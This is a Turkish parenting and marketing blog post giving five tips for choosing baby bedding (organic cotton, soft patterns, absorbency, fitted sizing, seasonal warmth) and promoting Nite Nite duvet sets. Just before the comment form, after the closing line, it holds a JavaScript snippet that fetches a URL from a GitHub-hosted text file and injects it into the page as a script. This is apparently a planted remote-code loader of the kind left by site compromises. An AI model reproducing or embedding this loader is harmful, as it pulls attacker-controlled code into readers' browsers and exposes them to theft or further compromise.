;

Bebek nevresimi nasıl olmalı? dikkat edilecek 5 özellik

Bebek nevresimi nasıl olmalı? dikkat edilecek 5 özellik

Bebek nevresimi seçimi, bebeklerin gelişiminde en önemli yeri tutan; “düzenli ve sağlıklı uyku” için sandığınızdan daha önemlidir.

Ailemizin minik üyeleri bebekler, yetişkinlerden daha fazla uykuya ihtiyaç duyar. Bebekler uykuda gelişimlerini devam ettirirken kaliteli, düzenli ve rahat bir uyku bu gelişimi zirveye taşır. Uzmanların da önerdiği gibi bebeklerin en az bir sene yastık kullanmadan, düz nevresim üzerinde uyutulmaları sağlıklı ve mutlu olarak büyümelerini hızlandırır.

Peki en kıymetlimiz bebeğimizi hangi nevresimlerde yatıracağımıza nasıl karar vereceğiz? İlk bakışta nevresim takımlarının birçok farklı özelliği dikkat çekiyor. Hangi özelliğe nasıl dikkat etmeli? Gelin beraber bebeğinizin düzenli bir uyku uyuması için en doğru nevresim özelliklerini beraber inceleyelim.

Bebeklerinin uykusunu önemseyen aileler için nevresimlerde dikkat edilmesi gereken 5 özelliği sıraladık. Bu yazıyı okuduktan sonra bebeğinizi rahat ettirecek birbirinden güzel Nite Nite nevresim takımlarına da bir göz atın deriz!

Bebek nevresimi seçiminde dikkat etmeniz gereken 5 özellik

  •  %100 Organik pamuklu nevresimler

Bebek nevresimiBebek nevresimi seçiminde nevresimin kumaşı ilk dikkat edilmesi gereken özelliktir. Minikler, hassas ciltleri nedeniyle alerjik reaksiyonlara karşı savunmasız olabilir. Kalitesiz ve kötü malzemeler bebeğinizin sağlığını tehdit edebilir. Bu nedenle bebeğinizin cildi ile uyumlu, hava geçiren, rahat ve kaliteli bir uykuyu destekleyen yüzde 100 pamuklu nevresimleri tercih etmek önemlidir. Organik pamuk, hava geçirebilme özelliği ile nefes alır ve bebeğinizi rahat ettirir. Organik pamuk tüm ciltler için en uygun materyaldir.

* Tekstil ürünlerinde organik pamuğun önemi ile ilgili bilimsel makaleye ulaşmak isterseniz bu linki kullanın.

  • 2.  Sade desenlere sahip nevresimler

Bebeğinizin odasını dekore ederken materyalinden emin olduğunuz şık eşyaları seçmeye özen gösterdiğinizi biliyoruz. Bunu yaparken bazı ince noktalara da dikkat edebilirsiniz. Örneğin hassas gözlerini yormamak için bebekleri yoğun ve keskin bir ışığa maruz bırakmamak gerekir. Kısık ve yumuşak bir ışıklandırma tercih ederek bebeğinizin uyku kalitesini yükseltebilirsiniz. Aynı şekilde, ışığı keskin şekilde yansıtmayan, keskin renk geçişleri olmayan, yumuşak tonlara ve sade desenlere sahip, organik içerikli nevresim takımlarını tercih edebilirsiniz. Böylece bebeğiniz ilgisini dağıtmadan, daha huzurlu bir atmosferde uykuya dalabilir. Sakin bir uyku bebeğinizin en çok ihtiyaç duyduğu şeydir.

  • 3.  Terletmeyen ve emici nevresimler

Günümüzde bebek bezleri sızıntıyı ne kadar önlese de bazen tertemiz nevresim takımları üzerinde küçük kazalar meydana gelebilir. Gece boyunca bezden taşan sızıntılar ya da bebeğinizin uykusu sırasında terlemesi, onun ıslak ve hijyenik olmayan bir ortamda yatmasına neden olabilir. Bu durum bazı sağlık problemlerini de beraberinde getirip bebeğinizin cildinde kızarıklıklar oluşturabilir ya da üşütmesine neden olabilir. Bu nedenlerden bebeğinizin nevresiminin nefes alan, terletmeyen ve emici nitelikte olmasına dikkat etmelisiniz.

  • 4.  Kolayca geçirilen, uygun ölçüde bebek nevresimi

Gece boyunca hareket halinde uyuyan minikler, üzerinde yattıkları organik nevresimleri yerinden çıkarıp hassas tenleriyle uyumlu olmayan bir zeminde uyumaya devam edebilir. Bu nedenle elastik, yatağa kolayca geçirip takabildiğiniz ve yatak ölçülerine uygun nevresim takımlarını tercih edebilirsiniz. Ayrıca nevresim takımlarını çekmemeleri için yıkama talimatlarına uyarak temizlemeniz de oldukça önemlidir. Böylece kaliteli ve uzun süre kullanılabilir nevresim takımlarına sahip olabilirsiniz.

  • 5.  Mevsime uygun bebek nevresimi

Bebekler uykularında vücut ısılarını dengeleyemeyebilir. Uyku halindeyken üstleri açılırsa üşütüp hastalanabilirler. Bu yüzden bebeğiniz için daima mevsime uygun nevresim takımlarını seçip kullanmalısınız. Hava geçirme özelliğine sahip, oda sıcaklığından etkilenmeyen, bebeğin en ideal uyku sıcaklığı aralığı olan 16-20 santigrat dereceyi dengeli şekilde koruyabilen organik nevresimleri seçebilirsiniz.

İyi uykular!

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

LEAVE A COMMENT

Your email address will not be published. Required fields are marked *